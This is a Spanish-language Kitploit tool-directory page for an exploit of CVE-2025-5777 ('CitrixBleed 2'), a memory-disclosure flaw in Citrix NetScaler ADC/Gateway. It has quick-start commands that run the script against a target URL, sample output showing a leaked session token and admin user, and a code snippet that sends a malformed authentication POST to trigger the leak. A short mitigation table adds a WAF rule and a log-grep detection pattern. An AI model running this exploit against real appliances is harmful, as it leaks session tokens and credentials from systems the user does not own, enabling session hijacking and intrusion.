Skip to content
KitploitKITPLOIT
HerramientasExploitsBlog
Log in
Enviar
HerramientasExploitsBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-5777 — CVE-2025-5777 Citrix NetScaler Exploit de Fuga de Memoria (CitrixBleed 2) | Kitploit
Herramientas/GitHubGitHub/bughuntar/cve-2025-5777
Forensia de MemoriaAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebRecopilación de InformaciónPruebas de Penetración
GitHubbughuntar/cve-2025-5777

CVE-2025-5777

CVE-2025-5777 Citrix NetScaler Exploit de Fuga de Memoria (CitrixBleed 2)

Ver Repositorio
30763hace 1 añoRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2025-5777 - Exploit de Fuga de Memoria de Citrix NetScaler

Banner


📌 Resumen

Esta herramienta demuestra la CVE-2025-5777, una vulnerabilidad crítica de divulgación de memoria en dispositivos Citrix NetScaler ADC/Gateway. El exploit filtra contenidos sensibles de memoria a través de solicitudes de autenticación malformadas.

Características principales:
✔ Detección de fugas de memoria mediante análisis de respuestas XML
✔ Volcado hexadecimal+ASCII de regiones de memoria filtradas
✔ Formato de solicitud compatible con Burp Suite
✔ Solicitudes asíncronas para pruebas eficientes


🔍 Prueba de Concepto

1. Solicitud Vulnerable (Burp Suite)

Burp Request

2. Exploit en Acción

Tool Execution


⚡ Inicio Rápido

git clone https://github.com/bughuntar/CVE-2025-5777.git
cd CVE-2025-5777
pip install requests beautifulsoup4 aiohttp colorama
chmod +x citrix_memory_leak.py
python3 citrix_memory_leak.py https://target-netscaler.com

Salida Esperada:

+ [+] Memory leak detected!
--- Leaked Memory Hex Dump ---
00000000  73 65 73 73 69 6F 6E 3D 31 32 33 34 35 36 37 38  session=12345678
00000010  55 73 65 72 3A 20 61 64 6D 69 6E 00 00 00 00 00  User: admin.....

🛡️ Mitigación

AcciónComando/Referencia
ParcheBoletín de Seguridad de Citrix
Regla WAFBlock POST /p/u/doAuthentication.do with malformed params
Deteccióngrep 'POST /p/u/doAuthentication.do' netscaler.log

📚 Recursos

  • Entrada NVD
  • Artículo Técnico

🖥️ Destacados del Código

# Malformed request trigger
async def exploit(target):
    async with aiohttp.post(
        f"{target}/p/u/doAuthentication.do",
        data="login",  # Missing equals sign triggers leak
        ssl=False
    ) as response:
        await parse_leak(await response.read())

⚠️ Aviso Legal

- This tool is for authorized testing ONLY.
- Unauthorized use violates international cybersecurity laws.

Descargo de responsabilidad completo: DISCLAIMER.md

Autor: Professor the Hunter

Descargar herramienta